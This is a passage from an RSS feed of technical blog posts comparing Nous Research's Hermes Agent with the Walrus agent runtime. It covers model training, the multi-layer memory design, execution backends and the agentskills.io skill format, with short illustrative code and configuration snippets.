  &lt;span class="na"&gt;user_char_limit&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1375&lt;/span&gt;         &lt;span class="c1"&gt;# ~500 tokens for USER.md&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each layer can be disabled independently. You can run Hermes with just skills and FTS5 (fully local, no external services) or add Honcho for user modeling. The &lt;code&gt;skip_memory&lt;/code&gt; parameter in the &lt;code&gt;AIAgent()&lt;/code&gt; constructor disables persistence entirely.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
The cost profile is bimodal: four layers are effectively free (local files, local SQLite), one layer (Honcho) requires an external service with LLM calls. FTS5 has the highest storage growth because it indexes every session.&lt;/p&gt;

&lt;h2&gt;
  
  
  How it compares
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Hermes Agent&lt;/th&gt;
&lt;th&gt;Mem0&lt;/th&gt;
&lt;th&gt;Walrus&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Memory layers&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;3 scopes&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Procedural memory&lt;/td&gt;
&lt;td&gt;SKILL.md (autonomous)&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;User modeling&lt;/td&gt;
&lt;td&gt;Honcho (dialectical reasoning)&lt;/td&gt;
&lt;td&gt;User scope (LLM extraction)&lt;/td&gt;
&lt;td&gt;Graph entities (agent-driven)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-session recall&lt;/td&gt;
&lt;td&gt;FTS5 + LLM summarization&lt;/td&gt;
&lt;td&gt;Vector similarity retrieval&lt;/td&gt;
&lt;td&gt;Graph traversal + journals&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deduplication&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;LLM-powered (cosine 0.85)&lt;/td&gt;
&lt;td&gt;Upsert by key&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Forgetting&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;DELETE operation&lt;/td&gt;
&lt;td&gt;compact / distill tools&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;External services&lt;/td&gt;
&lt;td&gt;1 (Honcho, optional)&lt;/td&gt;
&lt;td&gt;4 self-hosted / 1 managed&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Skill portability&lt;/td&gt;
&lt;td&gt;agentskills.io (11+ tools)&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LLM calls per write&lt;/td&gt;
&lt;td&gt;1 (skill creation)&lt;/td&gt;
&lt;td&gt;2 (extract + decide)&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  What walrus does differently
&lt;/h2&gt;

&lt;p&gt;Walrus's single layer — LanceDB + lance-graph with six tools (remember, recall, relate, connections, compact, distill) — is a deliberate bet against complexity.&lt;/p&gt;

&lt;p&gt;No skill documents, no user modeling service, no FTS5 index. The agent decides what's worth remembering and writes it to the graph. The agent queries the graph when it needs context. The agent compacts when memory grows.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where Hermes wins&lt;/strong&gt;: procedural memory is genuinely valuable. An agent that writes down how it solved a problem and reuses that solution later is a meaningful capability. Walrus doesn't have this — the agent can &lt;code&gt;remember&lt;/code&gt; facts and &lt;code&gt;relate&lt;/code&gt; entities, but it can't capture a multi-step procedure as a reusable unit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where walrus wins&lt;/strong&gt;: zero external services, zero LLM calls per write, one mental model. When something goes wrong with memory in walrus, you inspect one graph. When something goes wrong in Hermes, you debug across five layers — was the skill created? Was it indexed? Did Honcho derive the right conclusion? Did FTS5 find the right session?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The deeper question&lt;/strong&gt;: is five layers the right number? Could Hermes achieve 90% of the benefit with two layers (skills + FTS5) and skip the vector store, Honcho, and the complexity they add? The answer depends on whether user modeling and contextual persistence produce measurable improvements — and right now, that evidence doesn't exist publicly.&lt;/p&gt;

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Does the closed learning loop actually compound?&lt;/strong&gt; No published benchmarks measure skill reuse rates or user model accuracy over time. The architecture is sound — does it work after 500 sessions?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;What triggers skill creation?&lt;/strong&gt; The complexity threshold is undocumented. Without knowing when the agent will or won't create a skill, developers can't rely on skill accumulation as a feature.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Can five layers stay consistent?&lt;/strong&gt; A skill says "use yarn." The user tells the agent "I switched to pnpm." The FTS5 index has sessions using both. Does the agent reconcile these, or does it depend on which layer it queries first?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Does Honcho user modeling measurably improve task performance?&lt;/strong&gt; Dialectical reasoning is a novel approach. But the value proposition — "the agent understands you better over time" — needs evidence. A/B test results, task completion rate comparisons, anything quantitative.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;What happens after six months of heavy use with no forgetting?&lt;/strong&gt; Skills accumulate, FTS5 grows, Honcho representations multiply. At what point does the noise outweigh the signal? Does retrieval quality degrade as the corpus grows?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://github.com/NousResearch/hermes-agent" rel="noopener noreferrer"&gt;Hermes Agent&lt;/a&gt; — MIT license, 6K+ stars&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://honcho.dev/" rel="noopener noreferrer"&gt;Honcho&lt;/a&gt; — user modeling library from Plastic Labs (&lt;a href="https://docs.honcho.to/" rel="noopener noreferrer"&gt;docs&lt;/a&gt;, &lt;a href="https://github.com/plastic-labs/honcho" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://agentskills.io/specification" rel="noopener noreferrer"&gt;agentskills.io specification&lt;/a&gt; — portable skill format&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2408.11857" rel="noopener noreferrer"&gt;Hermes 3 technical report&lt;/a&gt; — training pipeline and function calling&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/pdf/2508.18255" rel="noopener noreferrer"&gt;Hermes 4 technical report&lt;/a&gt; — hybrid reasoning and DataForge&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://blog.plasticlabs.ai/blog/Honcho-3" rel="noopener noreferrer"&gt;Honcho 3.0 release&lt;/a&gt; — performance improvements and embedding reuse&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/hermes-memory-system" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Hermes Agent: what Nous Research built</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:50:40 +0000</pubDate>
      <link>https://forem.com/crabtalk/hermes-agent-what-nous-research-built-m5b</link>
      <guid>https://forem.com/crabtalk/hermes-agent-what-nous-research-built-m5b</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Update (v0.0.7):&lt;/strong&gt; The comparison table in this post lists walrus as having "built-in" local inference. As of v0.0.7, local inference was removed — OpenWalrus now connects to remote providers only. Memory and search are now external WHS services.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;In February 2026, Nous Research released &lt;a href="https://github.com/NousResearch/hermes-agent" rel="noopener noreferrer"&gt;Hermes Agent&lt;/a&gt; — an open-source (MIT), Python-based agent runtime with persistent memory, autonomous skill creation, and local inference support via Ollama, vLLM, or llama.cpp. It positions itself "between a Claude Code style CLI and an OpenClaw style messaging platform agent." Six thousand GitHub stars in the first month.&lt;/p&gt;

&lt;p&gt;We dug into how it actually works: the training pipeline that produces its models, the multi-level memory system that lets it learn across sessions, and the agentskills.io standard that makes its skills portable to 11+ other tools. Here's what we found.&lt;/p&gt;

&lt;h2&gt;
  
  
  The model stack
&lt;/h2&gt;

&lt;p&gt;Hermes Agent runs on Hermes 3 and Hermes 4, a family of fine-tuned open-weight models from Nous Research. The models and the agent runtime are separate projects — Hermes Agent can use any OpenAI-compatible endpoint, but the Hermes models are purpose-built for agentic workloads.&lt;/p&gt;

&lt;h3&gt;
  
  
  Hermes 3 (August 2024)
&lt;/h3&gt;

&lt;p&gt;Fine-tuned on &lt;a href="https://llama.meta.com/" rel="noopener noreferrer"&gt;Llama 3.1&lt;/a&gt; at three scales: 8B, 70B, and 405B parameters. The &lt;a href="https://arxiv.org/abs/2408.11857" rel="noopener noreferrer"&gt;technical report&lt;/a&gt; details the training:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Data&lt;/strong&gt;: ~390M tokens of synthetically generated responses (not human feedback). 69% output tokens, 31% instruction tokens. Constructed March–August 2024.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Training&lt;/strong&gt;: Two-phase — supervised fine-tuning (SFT) followed by direct preference optimization (DPO).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Packing&lt;/strong&gt;: 96% sample packing efficiency at 8192-token sequences via Flash Attention 2 with attention masking to prevent cross-sample contamination.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Format&lt;/strong&gt;: ChatML (&lt;code&gt;&amp;lt;|im_start|&amp;gt;&lt;/code&gt; / &lt;code&gt;&amp;lt;|im_end|&amp;gt;&lt;/code&gt; delimiters) for OpenAI API compatibility.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Function calling&lt;/strong&gt;: Trained on the &lt;a href="https://huggingface.co/datasets/NousResearch/hermes-function-calling-v1" rel="noopener noreferrer"&gt;hermes-function-calling-v1&lt;/a&gt; dataset — single and multi-turn function calling, structured JSON outputs, agentic scenarios. Tools specified in &lt;code&gt;&amp;lt;tools&amp;gt;&lt;/code&gt; XML tags, invoked via JSON with &lt;code&gt;arguments&lt;/code&gt; and &lt;code&gt;name&lt;/code&gt; fields.&lt;/li&gt;
&lt;/ul&gt;
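&lt;p&gt;The calling convention above can be sketched as: tool schemas serialized inside &lt;code&gt;&amp;lt;tools&amp;gt;&lt;/code&gt; tags, calls parsed back out of JSON. The exact system-prompt wording varies; this shows the shape only:&lt;/p&gt;

```python
# Shape of the Hermes-style function-calling format described above:
# schemas go into a <tools> block, calls come back as JSON objects with
# "name" and "arguments" fields. Prompt wording is illustrative.
import json

def tool_prompt(tools: list[dict]) -> str:
    """Serialize tool schemas into a <tools> block for the system prompt."""
    body = "\n".join(json.dumps(t) for t in tools)
    return "<tools>\n" + body + "\n</tools>"

def parse_tool_call(raw: str) -> tuple[str, dict]:
    """Parse a model-emitted JSON tool call into (name, arguments)."""
    call = json.loads(raw)
    return call["name"], call["arguments"]
```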

&lt;p&gt;The predecessor model (Hermes 2 Pro) achieved 90% function calling accuracy compared to 60–70% for general-purpose models of similar size. Hermes 3 improved on this across multiple benchmarks while adding enhanced code generation and multi-turn conversation handling.&lt;/p&gt;

&lt;h3&gt;
  
  
  Hermes 4 (August 2025)
&lt;/h3&gt;

&lt;p&gt;A significant jump. The &lt;a href="https://arxiv.org/pdf/2508.18255" rel="noopener noreferrer"&gt;technical report&lt;/a&gt; documents two major innovations:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hybrid reasoning&lt;/strong&gt;: Models toggle between standard responses and explicit deliberation using &lt;code&gt;&amp;lt;think&amp;gt;...&amp;lt;/think&amp;gt;&lt;/code&gt; tags. Thinking traces can extend up to 16,000 tokens. Users choose whether they want fast answers or detailed reasoning — the model adapts rather than always defaulting to verbose chain-of-thought.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;DataForge&lt;/strong&gt;: A graph-based synthetic data generation system that replaced the manual curation pipeline. Each node in a DAG performs a struct-to-struct transformation — converting simple seed data into complex training formats (e.g., Wikipedia article → rap song → Q&amp;amp;A pair). An LLM judge evaluates outputs on coherence, relevance, complexity, style, and tone, iterating until the sample passes or hits a maximum retry count.&lt;/p&gt;
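&lt;p&gt;The generate-judge-retry cycle at each DAG node can be sketched as follows; the transform and judge here are stand-ins for DataForge's LLM stages:&lt;/p&gt;

```python
# One DataForge-style node in miniature: transform the seed, score the
# candidate with a judge, retry until it passes or retries run out.
# Both callables are stand-ins for the LLM stages described above.

def generate(seed: str, transform, judge, max_retries: int = 3):
    """Run one DAG node; return a passing sample or None."""
    for attempt in range(max_retries):
        candidate = transform(seed, attempt)
        if judge(candidate):
            return candidate
    return None
```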

&lt;p&gt;The numbers tell the scaling story: Hermes 3 used 1M samples and 1.2B tokens. Hermes 4 uses ~5M samples and ~60B tokens — 5x more samples, 50x more tokens. Of those 5M samples, 3.5M are reasoning-heavy (intentionally longer) and 1.6M are non-reasoning.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hermes 4.3 (36B)&lt;/strong&gt; is particularly interesting: it's fine-tuned on &lt;a href="https://github.com/bytedance-seed/seed" rel="noopener noreferrer"&gt;ByteDance Seed 36B&lt;/a&gt;, not Llama. This breaks the assumption that all Hermes models share a Llama backbone. It achieves a 78.4% reduction in overlong reasoning generation on AIME'24 with only a 4.7% accuracy cost — solving the "model thinks for too long" problem that plagues many reasoning models.&lt;/p&gt;

&lt;h3&gt;
  
  
  Atropos
&lt;/h3&gt;

&lt;p&gt;The training uses &lt;a href="https://github.com/NousResearch/atropos" rel="noopener noreferrer"&gt;Atropos&lt;/a&gt;, Nous Research's distributed reinforcement learning framework. It's not standard RLHF — it's a rollout handler that manages asynchronous coordination across potentially thousands of distributed workers, addressing the challenge of highly variable LLM generation times. In Hermes 4 training, Atropos drives rejection sampling across ~1,000 task-specific verifiers to filter for high-quality reasoning trajectories.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Agent architecture
&lt;/h2&gt;
&lt;h3&gt;
  
  
  The ReAct loop
&lt;/h3&gt;

&lt;p&gt;Hermes Agent implements the classic &lt;a href="https://arxiv.org/abs/2210.03629" rel="noopener noreferrer"&gt;ReAct pattern&lt;/a&gt;: Observation (read terminal output, file contents) → Reasoning (analyze state against goals) → Action (execute commands, call tools) → Loop. The innovation isn't the loop itself — it's what surrounds it.&lt;/p&gt;
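&lt;p&gt;Stripped to control flow, the loop looks like this; &lt;code&gt;policy&lt;/code&gt; stands in for the model and all names are illustrative:&lt;/p&gt;

```python
# The ReAct cycle: observe, reason (via the policy), act, repeat until
# the policy decides it is done or the step budget runs out.

def react_loop(goal, policy, environment, max_steps: int = 90):
    observation = environment("start")
    for _ in range(max_steps):
        action = policy(goal, observation)   # reasoning step
        if action == "done":
            return observation
        observation = environment(action)    # act, then observe
    return observation
```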
&lt;h3&gt;
  
  
  Multi-level memory
&lt;/h3&gt;

&lt;p&gt;Five layers of persistence, from ephemeral to permanent:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Short-term inference memory&lt;/strong&gt;: Standard transformer context within a single session. Nothing survives restart.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Procedural skill documents&lt;/strong&gt;: Persistent markdown files (SKILL.md) capturing step-by-step solutions to completed tasks. Created autonomously when the agent finishes something complex — debugging a microservice, optimizing a pipeline. Unlike standard RAG (which retrieves disjointed snippets), skills maintain cohesive procedural understanding.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Contextual persistence&lt;/strong&gt;: Searchable vector store indexing skill documents for workflow retrieval. When a new task resembles a past task, the relevant skill is retrieved and used as a starting scaffold.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;User modeling via &lt;a href="https://honcho.dev/" rel="noopener noreferrer"&gt;Honcho&lt;/a&gt;&lt;/strong&gt;: An entity-centric memory library from &lt;a href="https://github.com/plastic-labs/honcho" rel="noopener noreferrer"&gt;Plastic Labs&lt;/a&gt;. Represents both users and agents as "peers." Asynchronously reasons about peer psychology from messages, deriving facts and storing them in reserved collections. No messages = no reasoning = no memory. The model evolves over time: preferences, work patterns, domain expertise.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Full-text search (FTS5)&lt;/strong&gt;: SQLite-based searchable database of all past interactions with LLM-powered summarization. Cross-session recall for "what did I do last Tuesday?" queries.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The closed learning loop ties these together: the agent completes tasks → creates skill documents → skills improve during subsequent use → periodic nudges prompt the agent to persist valuable knowledge → FTS5 enables cross-session recall → Honcho builds an evolving model of the user. Each session makes the next one better.&lt;/p&gt;

&lt;p&gt;This is a different philosophy from walrus's graph-based memory (LanceDB + lance-graph with Agent/User/Episode nodes). Hermes leans on procedural knowledge (skill docs) and user modeling (Honcho). Walrus leans on relational knowledge (graph traversal) and episode replay. Both aim for the same outcome — agents that remember — but the representations differ. We explored these tradeoffs in &lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;persistent agent memory research&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;
  
  
  Six terminal backends
&lt;/h2&gt;

&lt;p&gt;Hermes Agent separates the agent runtime from the execution environment. Six backends implement a common &lt;code&gt;BaseEnvironment&lt;/code&gt; interface:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Backend&lt;/th&gt;
&lt;th&gt;Use case&lt;/th&gt;
&lt;th&gt;Key feature&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Local&lt;/td&gt;
&lt;td&gt;Development, personal use&lt;/td&gt;
&lt;td&gt;Direct system execution, no isolation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Production, security-sensitive&lt;/td&gt;
&lt;td&gt;Read-only root filesystem, dropped capabilities, PID limits, namespace isolation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SSH&lt;/td&gt;
&lt;td&gt;Remote servers&lt;/td&gt;
&lt;td&gt;Persistent environment across sessions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Daytona&lt;/td&gt;
&lt;td&gt;Cloud development&lt;/td&gt;
&lt;td&gt;Serverless dev environments&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Singularity&lt;/td&gt;
&lt;td&gt;HPC, research clusters&lt;/td&gt;
&lt;td&gt;Container orchestration for compute-heavy workloads&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Modal&lt;/td&gt;
&lt;td&gt;Serverless production&lt;/td&gt;
&lt;td&gt;Hibernates when idle, wakes on demand, near-zero cost between sessions&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Configuration is a single line in &lt;code&gt;~/.hermes/config.yaml&lt;/code&gt;: &lt;code&gt;backend: modal&lt;/code&gt;. The agent code doesn't change — only the execution surface.&lt;/p&gt;

&lt;p&gt;MCP (Model Context Protocol) support is built in. The client connects at startup, discovers tools from configured servers, and registers them as first-class tools. Automatic reconnection uses exponential backoff (1s → 2s → 4s → 8s → 16s, max 5 attempts). Both stdio-based (local subprocesses) and HTTP-based (remote StreamableHTTP) servers are supported.&lt;/p&gt;
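&lt;p&gt;That reconnect schedule is plain exponential doubling:&lt;/p&gt;

```python
# The quoted backoff schedule (1s, 2s, 4s, 8s, 16s over five attempts)
# as a delay generator.

def backoff_delays(base: float = 1.0, max_attempts: int = 5) -> list[float]:
    """Delay before each reconnect attempt, doubling from `base`."""
    return [base * (2 ** attempt) for attempt in range(max_attempts)]
```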
&lt;h2&gt;
  
  
  The agentskills.io standard
&lt;/h2&gt;

&lt;p&gt;The most consequential part of Hermes Agent might not be the agent itself — it's the &lt;a href="https://agentskills.io/specification" rel="noopener noreferrer"&gt;agentskills.io&lt;/a&gt; standard it follows for portable skills.&lt;/p&gt;

&lt;p&gt;A skill is a directory containing a &lt;code&gt;SKILL.md&lt;/code&gt; file with YAML frontmatter and markdown instructions:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;deploy-to-production&lt;/span&gt;
&lt;span class="na"&gt;description&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Safely deploy the current branch to production with rollback support&lt;/span&gt;
&lt;span class="na"&gt;license&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Apache-2.0&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;

&lt;span class="c1"&gt;## Steps&lt;/span&gt;

&lt;span class="s"&gt;1. Run the test suite and verify all tests pass&lt;/span&gt;
&lt;span class="s"&gt;2. Create a tagged release from the current branch&lt;/span&gt;
&lt;span class="s"&gt;3. Deploy using the project's deploy script&lt;/span&gt;
&lt;span class="s"&gt;4. Verify the deployment health check endpoint&lt;/span&gt;
&lt;span class="s"&gt;5. If health check fails, trigger automatic rollback&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The standard specifies minimal required fields (&lt;code&gt;name&lt;/code&gt;, &lt;code&gt;description&lt;/code&gt;), optional metadata, and an unrestricted markdown body (recommended under 5,000 tokens). Optional directories (&lt;code&gt;scripts/&lt;/code&gt;, &lt;code&gt;references/&lt;/code&gt;, &lt;code&gt;assets/&lt;/code&gt;) support more complex skills.&lt;/p&gt;
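&lt;p&gt;A naive check for the two required fields makes the minimalism concrete. This is an illustrative sketch, not the spec's reference tooling, and the hand-rolled parsing handles only flat &lt;code&gt;key: value&lt;/code&gt; frontmatter:&lt;/p&gt;

```python
# Minimal SKILL.md frontmatter check, assuming the two required fields
# (name, description) named in the agentskills.io spec. Not a full YAML
# parser; it reads only flat key: value lines between the --- markers.
def parse_frontmatter(text):
    lines = text.splitlines()
    if not lines or lines[0].strip() != "---":
        return None
    fields = {}
    for line in lines[1:]:
        if line.strip() == "---":
            break
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def validate_skill(text):
    """Return a list of problems; an empty list means the skill passes."""
    fields = parse_frontmatter(text)
    if fields is None:
        return ["missing frontmatter block"]
    return [f for f in ("name", "description") if f not in fields]
```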

&lt;p&gt;What makes this significant: &lt;strong&gt;11+ tools have adopted agentskills.io&lt;/strong&gt; — Claude Code, Cursor, GitHub Copilot, Gemini CLI, VS Code, Amp, Goose, Roo Code, Kiro, Codex, and OpenCode. A skill written for Hermes Agent works in Claude Code. A skill written for Cursor works in Hermes Agent. This is rare in the agent ecosystem — most skill/plugin systems are framework-specific.&lt;/p&gt;

&lt;p&gt;Walrus's approach is different: markdown skill files with YAML frontmatter and tag-based lookup across three tiers (builtin, user, project). The format is similar in spirit (markdown + metadata), but walrus skills are designed for the walrus runtime specifically, not for cross-framework portability. Whether agentskills.io becomes the universal standard or fragments into vendor-specific extensions is an open question — we discussed this in the context of our &lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;skills design philosophy&lt;/a&gt;.&lt;/p&gt;
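&lt;p&gt;The tiered lookup is easy to picture. A hedged sketch, assuming dict-shaped skills and builtin → user → project precedence, where later tiers shadow earlier ones; walrus's actual data structures may differ:&lt;/p&gt;

```python
# Sketch of tag-based skill lookup across three tiers. The tier names come
# from the post; the precedence rule (project shadows user shadows builtin)
# and the skill shape are assumptions for illustration.
TIERS = ("builtin", "user", "project")

def lookup_skill(tag, skills_by_tier):
    """Return the matching skill from the highest-priority tier, or None."""
    found = None
    for tier in TIERS:  # later tiers override earlier matches
        for skill in skills_by_tier.get(tier, []):
            if tag in skill.get("tags", []):
                found = skill
    return found
```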

&lt;h2&gt;
  
  
  How it compares
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Hermes Agent&lt;/th&gt;
&lt;th&gt;Claude Code&lt;/th&gt;
&lt;th&gt;OpenClaw&lt;/th&gt;
&lt;th&gt;Walrus&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Language&lt;/td&gt;
&lt;td&gt;Python&lt;/td&gt;
&lt;td&gt;TypeScript&lt;/td&gt;
&lt;td&gt;TypeScript&lt;/td&gt;
&lt;td&gt;Rust&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Local inference&lt;/td&gt;
&lt;td&gt;Ollama, vLLM, llama.cpp&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Built-in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory&lt;/td&gt;
&lt;td&gt;5-level (FTS5, vector, Honcho, skills)&lt;/td&gt;
&lt;td&gt;Session-based&lt;/td&gt;
&lt;td&gt;Session-based&lt;/td&gt;
&lt;td&gt;Graph + vector (LanceDB)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Skills&lt;/td&gt;
&lt;td&gt;agentskills.io (11+ tools)&lt;/td&gt;
&lt;td&gt;agentskills.io&lt;/td&gt;
&lt;td&gt;Custom&lt;/td&gt;
&lt;td&gt;Markdown + tags&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Setup&lt;/td&gt;
&lt;td&gt;pip + model server&lt;/td&gt;
&lt;td&gt;Subscription + IDE&lt;/td&gt;
&lt;td&gt;npm + API keys&lt;/td&gt;
&lt;td&gt;Single binary&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Backends&lt;/td&gt;
&lt;td&gt;6 (local, Docker, SSH, serverless)&lt;/td&gt;
&lt;td&gt;IDE-embedded&lt;/td&gt;
&lt;td&gt;Cloud gateway&lt;/td&gt;
&lt;td&gt;Local process&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Messaging&lt;/td&gt;
&lt;td&gt;Telegram, Discord, Slack, WhatsApp, Signal&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;20+ platforms&lt;/td&gt;
&lt;td&gt;Telegram, Discord&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stars&lt;/td&gt;
&lt;td&gt;6.1K&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;247K&lt;/td&gt;
&lt;td&gt;Early stage&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;License&lt;/td&gt;
&lt;td&gt;MIT&lt;/td&gt;
&lt;td&gt;Proprietary&lt;/td&gt;
&lt;td&gt;MIT&lt;/td&gt;
&lt;td&gt;MIT&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The architectural divide is clear. Hermes Agent gives you the most flexibility: six execution backends, five memory layers, broad messaging support, portable skills. The cost is setup complexity — Python runtime, a separate model server (Ollama/vLLM), configuration files, and dependency management.&lt;/p&gt;

&lt;p&gt;Walrus takes the opposite bet: one binary, built-in inference, zero external dependencies. Less flexibility, but the &lt;code&gt;curl | sh&lt;/code&gt; to running-agent path is measured in seconds, not minutes. As we explored in &lt;a href="https://openwalrus.xyz/blog/agent-calling-patterns" rel="noopener noreferrer"&gt;how agents call agents&lt;/a&gt;, the framework's architectural choices cascade into everything from &lt;a href="https://openwalrus.xyz/blog/agent-loop-prevention" rel="noopener noreferrer"&gt;loop prevention&lt;/a&gt; to deployment patterns.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the research says
&lt;/h2&gt;

